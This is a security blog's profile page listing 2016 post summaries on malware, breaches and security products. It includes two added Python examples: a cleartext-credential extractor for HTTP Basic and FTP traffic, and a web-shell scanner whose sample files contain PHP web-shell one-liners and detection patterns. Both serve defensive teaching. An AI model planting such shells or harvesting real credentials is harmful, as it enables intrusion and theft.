This is ThreatGeek's Typepad Profile.
Recent Activity
Security got the boring end of the stick when names for the generations were handed out. Instead of Millennials, Gen X, Baby Boomers or the Greatest Generation, we're stuck with "Next Gen." What comes after "Next Gen"? And where were the creative minds hiding when we needed them most? In this post, I’m going to focus on a sliver of the next-gen security stack that we get asked about every day. Specifically, where do next-gen firewalls stop and where do next-gen IPSs pick up the baton. But first, to understand next-gen security we need to take a quick trip down... Continue reading
Posted Dec 1, 2016 at Threat Geek
There are two types of runners: long-distance runners and sprinters. Everything about them is different. Sprinters are built for power while marathoners are built for endurance. But what if you could break the mold and find all of those capabilities in a single athlete? Endpoint detection and response (EDR) tools have faced a similar conundrum. Vendors have historically forced users to choose between architectures that were optimized for one activity at the expense of others. In short, the choices have been: Optimize for Speed: These tools generally use a peer-to-peer architecture that enables endpoints to communicate with each other. The... Continue reading
Posted Nov 30, 2016 at Threat Geek
In Part 1 of this series we asked the question: Would you re-hire your IPS if you interviewed it today? But it’s not a totally fair question. Because, before you hire someone (or in this case buy something) it’s pretty obvious that you need a deep and thorough understanding of what the job entails. Otherwise, frustration, handwringing, and assorted HR crises will emerge. So, we pose this question to you: Can you even remember why you bought your IPS in the first place? It seems like a self-answering question for a product whose name, after all, is an Intrusion Prevention... Continue reading
Posted Nov 15, 2016 at Threat Geek
Vawtrak, a.k.a. Neverquest, has been a prominent trojan in the banking world and numerous researchers have reported their findings about this malware. In August 2016, we blogged about the addition of a DGA to the banking trojan known as Vawtrak. The actors behind Vawtrak reacted to this attention by adjusting their tactics - enough to warrant a change in their DGA implementation. On November 9, 2016 the Threat Research Team at Fidelis Cybersecurity noticed a Vawtrak sample that appeared to be using an updated implementation of the DGA routine. The sample we analyzed was delivered by using Hancitor embedded in... Continue reading
Posted Nov 12, 2016 at Threat Geek
Commodity Remote Access Trojans (RATs) -- which are designed, productized and sold to the casual and experienced hacker alike -- put powerful remote access capabilities into the hands of criminals. RATs, such as H-W0rm, njRAT, KilerRAT, DarkComet, Netwire, XtremeRAT, JSocket/AlienSpy/Adwind and others, hold special interest for the Threat Research Team at Fidelis Cybersecurity. We're constantly following, detecting and monitoring the lifecycle of these RATs as they appear, disappear and often reappear under a new moniker. There have been recent reports [1, 2] about a new version of one such commodity RAT, H-W0rm (Hworm), and the various campaigns it is being... Continue reading
Posted Nov 9, 2016 at Threat Geek
Metadata gathered from your network can be a powerful ally in the battle against cyberattacks. In fact, you can do seemingly impossible things with the right metadata. In Part 1, we explored how metadata can help you spot phishing emails, find man-in-the-middle attacks, locate weak encryption and more. In Part 2, we take a look at five more seemingly impossible tasks. If these examples sound interesting, watch the webinar I recently did with Hardik Modi, our VP of Threat Research: 3 Ways to Reduce Detection Time from Months to Minutes. Impossible Task #6. See lateral movement within the network. If... Continue reading
Posted Oct 31, 2016 at Threat Geek
Bloomberg reporter Jordan Robertson recently sat down with Fidelis Cybersecurity Senior VP Mike Buratowski to discuss the malware and other data that attackers used to pull off the breach of the Democratic National Committee’s (DNC) servers. By examining the clues the attackers left behind, Mike explains how it's possible to attribute the attacks to a specific group of nation-state actors. Listen to Bloomberg Technology’s Decrypted Podcast and get the full story. Want to learn more? Read our analysis of the DNC intrusion malware. Continue reading
Posted Oct 27, 2016 at Threat Geek
Network Intrusion Prevention Systems have been a mainstay of the network security stack for well over a decade. When they first entered the mainstream in the early 2000s, the iPhone hadn't been invented. We were still in the age of the PalmPilot (anyone remember using that stylus?). But, at the time, IPSs represented real innovation. They were a welcome departure from the classic firewall, which was limited by its primitive accept-and-deny rules that were inadequate for the more sophisticated attacks to come. IPSs were a breath of fresh air. They came with new detection rule languages, like Snort's. They could operate... Continue reading
Posted Oct 26, 2016 at Threat Geek
Deception and crime go hand in hand. But knowing when you’re being deceived means you need to think like the bad guys and know what to look for. There are three elements of deception. To see these elements in action, we need look no further than a few notable cases -- including the alleged Russian state actors behind the DNC and DCCC breaches as they continue to dump documents intended to influence the upcoming U.S. election. Let’s take a look at the three elements of effective deception. 1. Plan and Prepare The key is to create a storyline that’s mostly... Continue reading
Posted Oct 25, 2016 at Threat Geek
Metadata is data that describes other data. And while it may not sound sexy, metadata gathered from your network can be a powerful ally in the battle against cyberattacks. Continue reading
Posted Oct 17, 2016 at Threat Geek
In November 2015, the Dyre banking trojan seemingly disappeared overnight, surprising security researchers worldwide. Months later it was announced that Russian authorities had arrested most of the gang responsible for its operations. Prior to that, it was a relatively rare act for Russian authorities to take action in such matters. Since then, nothing has been heard from those actors, but the speculation was that some of the programmers and other elements of the criminal operation would be subsumed into other cybercriminal operations. In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has... Continue reading
Posted Oct 15, 2016 at Threat Geek
For several years now, the Vawtrak trojan has been targeting banking and financial institutions, most recently in Canada as reported last week. The Fidelis Threat Research team recently analyzed a new variant of Vawtrak using HTTPS for C2 communications. Given what we've seen previously with Vawtrak, simply switching to HTTPS is not a major update in terms of development -- but it does show that the threat actors are interested in protecting their C2 communications. Here are some significant updates to Vawtrak: The malware now includes a DGA. Interestingly, it utilizes a pseudorandom number generator (PRNG) used in Vawtrak's loader.... Continue reading
Posted Aug 16, 2016 at Threat Geek
Fidelis Cybersecurity is proud to support the Wall of Sheep (WoS) at Def Con 2016, but this Wall needs to come down. Over the past several years, it's been standing-room only for WoS participants. This year's event promises to be even more spectacular. For those who need background, the 'sheep' on this wall are users whose internet traffic reveals their credentials (user names and passwords) passed in the clear, for prying eyes to see. The exercise starts as users sign on to the conference’s free wireless network. A copy of that traffic is given to participants whose job is to... Continue reading
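The check the Wall of Sheep participants perform is a passive one: no exploitation, just reading what the network already carries. The following is an added example (not Fidelis or Wall of Sheep code) that runs that check over a few constructed TCP payloads standing in for reassembled streams. It pulls credentials from two protocols that still ship them in plaintext, HTTP Basic authentication and FTP USER/PASS logins, and masks the passwords before display the way the Wall does. All hosts, names and credentials in the sample are made up.

```python
"""Spot credentials sent in the clear over a shared network.

Added example, not Fidelis or Wall of Sheep code. Works on constructed
TCP payloads (no live capture, no pcap library needed): anything that
hands the tool a reassembled stream can use the same two extractors.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample streams: (source IP, destination IP, destination port, payload).
# Hosts, users and passwords are fictional.
SAMPLE_STREAMS = [
    ("10.0.0.5", "203.0.113.10", 80,
     "GET /mail/ HTTP/1.1\r\nHost: webmail.example.test\r\n"
     "Authorization: Basic " + base64.b64encode(b"alice:hunter2").decode() + "\r\n\r\n"),
    ("10.0.0.7", "203.0.113.20", 21,
     "USER bob\r\nPASS letmein99\r\nPWD\r\n"),
    ("10.0.0.9", "203.0.113.30", 443,
     "\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),      # TLS ClientHello: nothing readable
    ("10.0.0.11", "203.0.113.40", 80,
     "GET / HTTP/1.1\r\nHost: www.example.test\r\n\r\n"),  # unauthenticated HTTP: no credential
]


@dataclass
class Sheep:
    src: str
    dst: str
    protocol: str
    username: str
    password: str  # already masked


def mask(secret: str, keep: int = 2) -> str:
    """Reveal only the first `keep` characters; enough to prove the point, not to reuse."""
    if len(secret) <= keep:
        return "*" * len(secret)
    return secret[:keep] + "*" * (len(secret) - keep)


_BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.I | re.M)
_FTP_USER_RE = re.compile(r"^USER\s+(\S+)\s*$", re.I | re.M)
_FTP_PASS_RE = re.compile(r"^PASS\s+(\S+)\s*$", re.I | re.M)


def http_basic_credentials(payload: str) -> Optional[Tuple[str, str]]:
    """HTTP Basic is base64, not encryption: decode the header and split on the first colon."""
    m = _BASIC_RE.search(payload)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (ValueError, binascii.Error):
        return None  # header present but not valid base64; ignore rather than guess
    user, sep, pwd = decoded.partition(":")
    return (user, pwd) if sep else None


def ftp_credentials(payload: str) -> Optional[Tuple[str, str]]:
    """FTP sends USER and PASS as plain command lines on the control channel."""
    u = _FTP_USER_RE.search(payload)
    p = _FTP_PASS_RE.search(payload)
    if u and p:
        return (u.group(1), p.group(1))
    return None


def find_sheep(streams) -> List[Sheep]:
    """Run every extractor over every stream and collect the exposed logins."""
    found: List[Sheep] = []
    for src, dst, _dport, payload in streams:
        creds = http_basic_credentials(payload)
        proto = "HTTP Basic"
        if creds is None:
            creds = ftp_credentials(payload)
            proto = "FTP"
        if creds is not None:
            found.append(Sheep(src, dst, proto, creds[0], mask(creds[1])))
    return found


if __name__ == "__main__":
    for s in find_sheep(SAMPLE_STREAMS):
        print(f"{s.src:<12} -> {s.dst:<14} {s.protocol:<10} {s.username}:{s.password}")
```

The TLS stream in the sample produces nothing, which is the whole lesson of the Wall: the same login over HTTPS or FTPS is invisible to everyone else on the conference network. Extending the tool to other cleartext protocols (POP3 `USER`/`PASS`, IMAP `LOGIN`, HTTP form posts) is a matter of adding another extractor to `find_sheep`.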
Posted Aug 2, 2016 at Threat Geek
Following news reports that the Democratic Congressional Campaign Committee (DCCC) was breached via a spoofed donation website, the ThreatConnect Research team and Fidelis Cybersecurity teamed up to collaborate and take a look at the associated domain to ferret out additional details on the activity. The initial indications from the DCCC breach suggest FANCY BEAR pawprints based on the following: First, the registrant - fisterboks@email[.]com - behind the spoofed domain actblues[.]com has registered three other domains, all of which have been linked to FANCY BEAR by German Intelligence (BfV). Second, the timing is consistent with an adversary reacting to heightened focus... Continue reading
Posted Aug 1, 2016 at Threat Geek
We're counting down the last few days to Black Hat USA 2016. As you pack your suitcase and map out your schedule, plan on joining a meetup, seeing a demo or hitting us up for swag at the Fidelis Networking Lounge (aka Booth #1116). We can’t promise unicorns and narwhals, but we will have cool t-shirts, pinball and comfy chairs. Here’s a quick rundown on where you can find us: TECHNOLOGY & FREEWARE: At Black Hat, we’re debuting no-cost tools to help the security community stop attacks and prevent data theft. New resources include the Barncat™ Intelligence Database, the ThreatScanner™... Continue reading
Posted Jul 28, 2016 at Threat Geek
In politics, getting the dirt on your adversary is nothing new. Candidates and campaigns have been trying to dig up dirt on each other since the dawn of democracy in Athens. More recently, we’ve seen everything from burgling party headquarters, to wiretaps, and campaign stalkers that record every word a candidate utters in public. Most of these methods were employed to obtain information on an opponent so the information could be “weaponized” into a “gotcha” moment during a speech or used as a campaign talking point to discredit the opposing party. But as we watch the DNC leak unfold, it... Continue reading
Posted Jul 26, 2016 at Threat Geek
Threat actors provide valuable clues when they compromise a new environment. But a single clue, such as a malware sample, seldom sheds the necessary light on an attack. Sniffing out the tools and tactics of attackers requires that you (or someone you know) have seen them before. Historical attack data can serve as a valuable resource for analysts by helping to identify and contextualize the adversary and rank the risk of an attack. Today, we are excited to make a new (and we think pretty interesting) database available to the security community at no cost. The Fidelis Barncat™ Intelligence Database... Continue reading
Posted Jul 21, 2016 at Threat Geek
One of our trusted partners from Poland, Exatel S.A., has discovered that a web browser developed by Maxthon, a company from China, has been collecting sensitive data from its users. The Maxthon browser has anywhere from 0.75-1% of the global browser market, and has been estimated to be 2-3% of China's own domestic browser market. Total global user count is estimated to be in the hundreds of millions. You can read their full report here: English: Polish: Using the Fidelis Network solution, Exatel found that there was a periodic upload of encrypted content to China from the Maxthon... Continue reading
Posted Jul 13, 2016 at Threat Geek
With season two of Mr. Robot approaching, the storyline follows a hacker group that takes down an evil global corporation and collapses the financial market. Led by the mysterious Mr. Robot, the hackers use a variety of tricks to evade detection, and seem to cover their tracks at every turn. There are similarities shared by the show's hackers and real-life attackers. Hackers are human. Like the rest of us, they are creatures of habit, turning to familiar tools and techniques time and time again. As they hone their craft, attackers develop their skills and accumulate knowledge. And while they go... Continue reading
Posted Jul 12, 2016 at Threat Geek
We've recently observed a new crypter called Xenon used to deliver Locky, a strain of ransomware, and Ruckguv, a type of malware that can download and install other types of malware. Xenon employs a novel trick to bypass debuggers, which we’ll describe here along with the techniques it uses. We also provide a Python script to decrypt objects packed using Xenon and the Krypton crypter, which we believe is its predecessor. Delivering and monetizing malware involves a large chain of independent tools – exploit kits, traffic distribution systems, spambots and more. The crypter occupies a special place in this chain,... Continue reading
Posted Jun 28, 2016 at Threat Geek
Well Britain, you’ve done it. The referendum is over and it's time to start thinking ahead about how the UK will reconcile its new laws and regulations. I believe that the UK could be at the beginning of a cybersecurity Renaissance, and I’ll explain why. At this point, it is uncertain how long it will take the United Kingdom to fully leave the EU, although the plan is that there will be a two-year transition phase. The next step in the process, according to Article 50 of the Lisbon Treaty, is for the UK to notify the EU council, although... Continue reading
Posted Jun 24, 2016 at Threat Geek
The Security Consulting team here at Fidelis specializes in investigations of critical security incidents by advanced threat actors. Last week, after Guccifer 2.0 claimed responsibility for the intrusion into the Democratic National Committee’s (DNC) servers, we were provided with the malware samples from the CrowdStrike investigation. We performed an independent review of the malware and other data (filenames, file sizes, IP addresses) in order to validate and provide our perspective on the reporting done by CrowdStrike. This blog post provides a summary of our findings. Many of you may be following the recent news related to the compromise of the... Continue reading
Posted Jun 20, 2016 at Threat Geek
What can bad guys use to launch a ransomware attack, facilitate an email spamming platform, or ensure persistent access to an enterprise? Compiled malware and compromised credentials could work. But web shells provide an even more stealthy way to establish a beachhead and quietly hide on the network for future operations. Web shells are not a new tactic. But they have been used in a number of recent attacks. We saw them in the ransomware attack that hit MedStar, which operates hospitals and healthcare facilities throughout the Washington D.C. metro area. Web shells have also recently been uncovered on a... Continue reading
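What makes a web shell stealthy is also what makes it findable: it is one more script in the web root that the server executes on request, so it has to get attacker-controlled input from the request into a code- or command-execution function. The following is an added example, not a Fidelis tool, that triages a set of constructed PHP files for exactly that combination and scores them. Paths and file contents are made up; the rule set is illustrative and would need tuning against a real application's code base.

```python
"""Triage web-accessible PHP files for web-shell indicators.

Added example, not a Fidelis tool. Looks for the pattern nearly every
PHP web shell shares: request-controlled input ($_GET, $_POST, ...)
reaching an eval-style or command-execution sink, or a decode-then-eval
chain used to hide the payload. Sample files are constructed inline.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample web root: paths and contents are fictional.
SAMPLE_FILES: Dict[str, str] = {
    "wwwroot/index.php": "<?php require 'app/bootstrap.php'; run_app(); ?>",
    # one-line shell dropped into an upload directory
    "wwwroot/uploads/cache.php": "<?php @eval($_POST['c']); ?>",
    # obfuscated variant: payload arrives base64-encoded, then is eval'd
    "wwwroot/images/thumb.php": (
        "<?php $f = base64_decode($_REQUEST['x']); "
        "if(isset($_REQUEST['x'])) { eval($f); } ?>"
    ),
    # command shell: request parameter straight into system()
    "wwwroot/admin/tools.php": "<?php echo system($_GET['cmd']); ?>",
    # legitimate code using preg_replace: must not fire
    "wwwroot/lib/helper.php": (
        "<?php function slug($s) { return preg_replace('/[^a-z0-9]+/', '-', strtolower($s)); } ?>"
    ),
    # legitimate system() with a fixed string: must not fire
    "wwwroot/cron/rotate.php": "<?php system('logrotate /etc/logrotate.conf'); ?>",
}

USER_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b"
CODE_SINKS = r"(?:eval|assert|create_function)"
CMD_SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open)"
DECODERS = r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)"

# (rule name, weight, pattern). Weights are illustrative.
RULES: List[Tuple[str, int, "re.Pattern[str]"]] = [
    # request input passed directly into a code-execution sink
    ("user-input-to-eval", 10, re.compile(CODE_SINKS + r"\s*\(\s*@?" + USER_INPUT, re.I)),
    # request input passed directly into a command-execution sink
    ("user-input-to-shell", 10, re.compile(CMD_SINKS + r"\s*\(\s*@?" + USER_INPUT, re.I)),
    # decoder wrapped around request input: obfuscated payload delivery
    ("decoded-user-input", 5, re.compile(DECODERS + r"\s*\(\s*" + USER_INPUT, re.I)),
    # eval() of any kind is rare in well-behaved application code
    ("eval-present", 3, re.compile(r"\beval\s*\(", re.I)),
    # error suppression on a code sink is a classic one-liner-shell tell
    ("suppressed-sink", 2, re.compile(r"@\s*" + CODE_SINKS + r"\s*\(", re.I)),
]


def score_file(content: str) -> Tuple[int, List[str]]:
    """Sum the weights of every rule that matches and return the rule names that fired."""
    score = 0
    hits: List[str] = []
    for name, weight, pattern in RULES:
        if pattern.search(content):
            score += weight
            hits.append(name)
    return score, hits


def scan(files: Dict[str, str], threshold: int = 5) -> List[Tuple[str, int, List[str]]]:
    """Return (path, score, hits) for every file at or above the threshold, worst first."""
    suspects = []
    for path, content in files.items():
        score, hits = score_file(content)
        if score >= threshold:
            suspects.append((path, score, hits))
    suspects.sort(key=lambda s: s[1], reverse=True)
    return suspects


if __name__ == "__main__":
    for path, score, hits in scan(SAMPLE_FILES):
        print(f"{score:>3}  {path}  ({', '.join(hits)})")
```

Pattern matching like this is a triage step, not a verdict: a shell can be split across files or built from string concatenation to dodge the sinks, so the usual companions are file-integrity baselines of the web root, web-server logs showing POSTs to files that never receive POSTs, and web-server child processes spawning shells. The `rotate.php` and `helper.php` samples are there to show the scanner ignores execution functions whose arguments are fixed strings rather than request data.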
Posted Jun 14, 2016 at Threat Geek
One of the biggest challenges when you go shopping for new security tools is answering the inevitable question from finance: “What’s the value?” Determining the ROI of a new security product isn’t always an exact science. There are no hard and fast rules to follow – which is why generic ROI calculators should be avoided at all costs (pun intended). But why is it so hard? Why can’t vendors just wow you with the promise of savings of 100%? The science of security is a moving target. Much like snowflakes, every organization is unique – their existing infrastructure, the size... Continue reading
Posted Jun 9, 2016 at Threat Geek
Fidelis Cybersecurity has been investigating a new variant of Ursnif, a family of trojans that captures and reports information about user activity back to the attacker. We recently observed the variant distributed in phishing runs designed to appear as legitimate banking-related emails. On infected hosts, it attempts to perform webinjects to capture credentials for major U.S. banking sites, including Citibank, JPMorgan Chase, USAA and Capital One. Interestingly, it takes screenshots when victims visit a variety of Italian sites, such as Unicredit, Poste and Relax Banking. To evade detection, it also blocks access to a surprisingly large number of security-related websites.... Continue reading
Posted Jun 7, 2016 at Threat Geek